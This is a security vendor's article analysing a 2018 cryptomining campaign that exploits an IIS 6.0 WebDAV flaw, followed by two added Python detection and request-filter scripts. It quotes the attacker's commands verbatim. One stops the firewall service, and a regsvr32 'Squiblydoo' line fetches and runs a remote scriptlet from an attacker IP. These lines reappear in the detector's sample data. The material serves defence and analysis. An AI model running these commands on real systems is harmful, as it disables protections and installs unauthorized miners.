Partner Perspectives | Andrey Shalnev | 5/10/2018 09:00 AM

Electroneum Cryptomining Targets Microsoft IIS 6.0 Vulnerability

New campaign shows that there are still systems exposed to the year-old CVE-2017-7269 vuln on an operating system that was declared end-of-life three years ago.

F5 researchers recently noticed a new campaign exploiting a year-old vulnerability in Microsoft Internet Information Services (IIS) 6.0 servers to mine Electroneum cryptocurrency. It uses the same IIS vulnerability (CVE-2017-7269) that ESET security researchers reported last year as having been abused to mine Monero and to launch targeted attacks against organizations by the notorious "Lazarus" group, which is widely believed to be North Korean government hackers.

This latest campaign shows that there are still systems vulnerable to this year-old vulnerability on an operating system that was declared end-of-life (EoL) three years ago. In March 2017, it was publicly disclosed that Microsoft Internet Information Services (IIS) 6.0 is vulnerable to a buffer overflow vulnerability in its WebDAV functionality; on successful exploitation, it is possible to remotely execute code. Upon release, it was reported that the vulnerability was already being exploited in the wild, and within two days a Proof-of-Concept (POC) exploit was published.

Shellcode Analysis

The exploit in this campaign is identical to the original Proof-of-Concept (POC) exploit published in March 2017, but it embeds a different shellcode to execute the attacker's commands. The shellcode itself is an ASCII shellcode which contains a Return-Oriented Programming (ROP) chain. ASCII shellcode is machine code that consists entirely of alphanumeric ASCII or Unicode characters, which allows an attacker to bypass input restrictions. The ROP exploitation technique composes shellcode from instructions already loaded into memory, called "gadgets," instead of writing and executing additional external code in memory. This allows attackers to bypass security mechanisms such as executable space protection and code signing.

The execution of this shellcode results in opening a reverse shell to a malicious remote server. A reverse shell is a type of shell in which the target machine communicates back to attacker’s remote machine and waits for the attacker to send shell commands.

Once the compromised server is connected to the attacker’s remote machine, it will automatically receive and execute two commands.

[Image: the two commands received by the compromised server. Image Source: F5]

First Command

CD /d %WinDir%\Temp\ & Net Stop SharedAccess /Y

This command stops the “Internet Connection Firewall (ICF)” service, which if present, may block outgoing communication from the compromised machine.

Second Command

TaskKill /IM RegSvr32.exe /f & Start RegSvr32.exe /s /n /u /i:http://117.79.132.174/images/test.sct scrobj.dll

Here, the attacker is using a technique named "Squiblydoo" to bypass software whitelisting protection by executing attacker commands with a legitimate Microsoft binary. It allows the attacker to fetch and execute a remote Extensible Markup Language (XML) file that contains "scriptlets" with the attacker's code of choice, using the legitimate and signed "regsvr32" Windows binary. This binary is proxy aware, uses Transport Layer Security (TLS) encryption, and follows redirects.

Executing the Scriptlets

The downloaded XML file named "test.sct" contains VBScript scriptlets that hold the attacker's commands. The Microsoft Visual Basic Scripting (VBScript) code still had the attacker's comments embedded.

Updating the Malware

If the attacker compromised the server previously, the script will stop and replace the old binary file with a new one before execution. The script tries to terminate the process of a specific file named "lsass.eXe" that is located in the Windows OS folder under the path "/System32/Temp."

The name "lsass.eXe" was chosen to mask the malicious file as the legitimate "lsass" process, a critical part of Windows. To make sure that the process terminates before the script tries to delete the file, the attacker uses the "ping" command to delay script execution. Our assumption is that the attacker chose the "ping" command over the "sleep" command because it is less suspicious. The "sleep" command appears to be commented out.

After performing these commands, the script creates a new file in the same location with the same name using the binary data from the Base64 string and executes it.

Getting Persistence as RPC Service

The script tries to register the execution command as an "RpcRemote" service to launch itself upon every system startup, which grants persistence on the target. The name "RpcRemote" was chosen to make it look like a legitimate component of the operating system.

Mining Electroneum

By looking at the command line executed by the script, we assume that the executable file is a crypto-currency miner. The clues are the "-p" and "-u" arguments, the "stratum+tcp://" address, and the long wallet address starting with the letters "etn", implying the Electroneum (ETN) crypto-coin. The file itself is a 32-bit version of a crypto-currency miner called XMRig (2.5.2) that was packed using the "Ultimate Packer for Executables" (UPX) packer.

The execution command instructs the miner to mine the Electroneum crypto-currency using several pools simultaneously to this wallet:

etnjzC1mw32gSBsjuYgwWKH5fZH6ca45MDxi6UwQQ9C8GJErY3rVrqJA8sDtPKMJXsPuv4vdSyDzGVTVqgAh97GT8smQMoUaQn
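The chain described above (firewall service stopped, Squiblydoo via regsvr32, an "lsass.eXe" running from a Temp folder, an "RpcRemote" service, and an XMRig-style command line pointing at a stratum pool with an ETN wallet) leaves host artifacts a defender can match on. The script below is an added example, not F5's code: it runs a handful of such checks over constructed telemetry records. The record field names ("type", "image", "cmdline", "name") are assumptions; the two command lines quoted from the article are reproduced verbatim, while the miner command line is a constructed XMRig-style invocation (-o/-u/-p) that uses the wallet address reported above, and the pool host "pool.example" is a placeholder.

```python
"""Host-telemetry checks for the IIS 6.0 cryptomining chain described in this article.

Added example, not F5's code. Event records are constructed to resemble
process-creation and service-install telemetry; field names are assumptions.
"""
import re
from typing import Dict, List

# Constructed sample telemetry. Records 0 and 1 carry the command lines quoted in the
# article; records 2-4 are assumptions that follow the article's description.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"CD /d %WinDir%\Temp\ & Net Stop SharedAccess /Y"},
    {"type": "process", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"RegSvr32.exe /s /n /u /i:http://117.79.132.174/images/test.sct scrobj.dll"},
    {"type": "process", "image": r"C:\Windows\System32\Temp\lsass.eXe",   # masquerading miner
     "cmdline": "lsass.eXe -o stratum+tcp://pool.example:3333 "            # pool host is a placeholder
                "-u etnjzC1mw32gSBsjuYgwWKH5fZH6ca45MDxi6UwQQ9C8GJErY3rVrqJA8sDtPKMJXsPuv4vdSyDzGVTVqgAh97GT8smQMoUaQn "
                "-p x"},
    {"type": "service", "name": "RpcRemote", "image": r"C:\Windows\System32\Temp\lsass.eXe"},
    {"type": "process", "image": r"C:\Windows\System32\lsass.exe", "cmdline": "lsass.exe"},  # benign
]

# The only legitimate location of lsass.exe (compared case-insensitively).
CANONICAL_LSASS = r"c:\windows\system32\lsass.exe"

FW_STOP = re.compile(r"\bnet\s+stop\s+sharedaccess\b", re.I)
# regsvr32 fetching a scriptlet over HTTP(S) and loading it through scrobj.dll.
SQUIBLYDOO = re.compile(r"regsvr32(\.exe)?\b.*\s/i:(https?://\S+).*\bscrobj\.dll", re.I)
STRATUM = re.compile(r"stratum\+tcp://\S+", re.I)


def miner_args(cmdline: str) -> Dict[str, str]:
    """Pull pool URL, wallet and password out of an XMRig-style command line (-o/-u/-p)."""
    flags = {"-o": "pool", "-u": "wallet", "-p": "password"}
    toks = cmdline.split()
    out: Dict[str, str] = {}
    for i, tok in enumerate(toks[:-1]):
        if tok in flags:
            out[flags[tok]] = toks[i + 1]
    return out


def is_etn_wallet(wallet: str) -> bool:
    """Heuristic (assumption): ETN addresses are long alphanumeric strings starting with 'etn'."""
    return wallet.startswith("etn") and wallet.isalnum() and len(wallet) > 60


def check_process(ev: Dict[str, str]) -> List[str]:
    hits: List[str] = []
    cmd = ev.get("cmdline", "")
    image = ev.get("image", "").lower()
    if FW_STOP.search(cmd):
        hits.append("firewall-service-stop")
    if SQUIBLYDOO.search(cmd):
        hits.append("squiblydoo-regsvr32")
    # lsass.exe anywhere other than its canonical path is a masquerade, whatever the casing.
    if image.endswith("\\lsass.exe") and image != CANONICAL_LSASS:
        hits.append("lsass-masquerade")
    if STRATUM.search(cmd):
        hits.append("miner-stratum")
    if is_etn_wallet(miner_args(cmd).get("wallet", "")):
        hits.append("etn-wallet")
    return hits


def check_service(ev: Dict[str, str]) -> List[str]:
    hits: List[str] = []
    if ev.get("name", "").lower() == "rpcremote":
        hits.append("rpcremote-service")
    if "\\temp\\" in ev.get("image", "").lower():
        hits.append("service-binary-in-temp")
    return hits


def scan(events: List[Dict[str, str]]) -> List[List[str]]:
    """Return, per event, the list of rule names it triggered."""
    return [check_service(ev) if ev["type"] == "service" else check_process(ev) for ev in events]


if __name__ == "__main__":
    for ev, hits in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        print(ev["type"], ev.get("image"), "->", hits or "clean")
```

The lsass check compares the lower-cased full path against the one legitimate location rather than looking at the file name alone, which is what defeats the "lsass.eXe" casing trick; the service check flags any service whose binary lives under a Temp folder, not only the "RpcRemote" name, since the name is the easiest part for an attacker to change.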

At the time of writing, the attacker has earned roughly $99 from the campaign across both pools. This is a very small amount of money, given how lucrative most other crypto-mining campaigns currently are, making this campaign appear unsuccessful. One theory is that the attacker changes the wallet address from time to time. Another theory is that there aren't many exploitable IIS 6.0 servers left.

But although these attackers haven't made much money on this campaign yet, we encourage businesses to abandon the use of EoL software in every instance possible. When that's not feasible, we recommend patching any critical vulnerability immediately upon release of the patch. If patching is not possible, there are many compensating controls that can be implemented depending on your security control framework, such as blocking attacks with a Web Application Firewall (WAF), or not allowing vulnerable legacy systems to touch the internet.
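As an added example of the compensating-control idea (not F5's code, not the logic of any particular WAF product, and not part of the original article), the request filter below sits in front of a legacy IIS host and denies WebDAV methods unless they are explicitly allowed, caps header value length, and flags long alphanumeric runs of the kind an ASCII shellcode produces. The header name X-Sample, the two thresholds, the host name and the sample requests are constructed assumptions.

```python
"""Minimal request filter for a legacy web server (added example, not a product's logic).

Three checks: deny WebDAV methods unless allowed, cap header value length, and flag long
alphanumeric runs (the shape of ASCII shellcode). Thresholds are assumptions.
"""
import re
from typing import List, Tuple

WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK", "SEARCH"}
MAX_HEADER_VALUE = 4096   # assumption: conservative per-header-value cap in bytes
MIN_ALNUM_RUN = 256       # assumption: alphanumeric runs this long are treated as suspicious
ALNUM_RUN = re.compile(r"[A-Za-z0-9]{%d,}" % MIN_ALNUM_RUN)


def parse_request(raw: str) -> Tuple[str, str, List[Tuple[str, str]]]:
    """Split a raw HTTP/1.x request head into (method, target, [(header, value), ...])."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: List[Tuple[str, str]] = []
    for line in lines[1:]:
        if not line:
            continue
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return method.upper(), target, headers


def inspect(raw: str, webdav_allowed: bool = False) -> Tuple[str, List[str]]:
    """Return ("allow" | "block", reasons) for one request."""
    method, _target, headers = parse_request(raw)
    reasons: List[str] = []
    if method in WEBDAV_METHODS and not webdav_allowed:
        reasons.append(f"webdav-method:{method}")
    for name, value in headers:
        if len(value) > MAX_HEADER_VALUE:
            reasons.append(f"oversized-header:{name}")
        if ALNUM_RUN.search(value):
            reasons.append(f"alnum-run:{name}")
    return ("block" if reasons else "allow"), reasons


# Constructed sample requests (host name and X-Sample header are placeholders).
BENIGN = "GET /index.html HTTP/1.1\r\nHost: legacy.example\r\n\r\n"
WEBDAV_SHORT = "PROPFIND /docs/ HTTP/1.1\r\nHost: legacy.example\r\nDepth: 1\r\n\r\n"
SUSPECT = ("PROPFIND / HTTP/1.1\r\nHost: legacy.example\r\n"
           "X-Sample: " + "A" * 5000 + "\r\n\r\n")


if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("webdav-short", WEBDAV_SHORT), ("suspect", SUSPECT)):
        print(label, inspect(req), inspect(req, webdav_allowed=True))
```

The method check is the blunt control for a host that has no business serving WebDAV at all; the two header checks still apply when WebDAV is allowed, which is why a short, well-formed PROPFIND passes with webdav_allowed=True while the oversized request is blocked either way.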
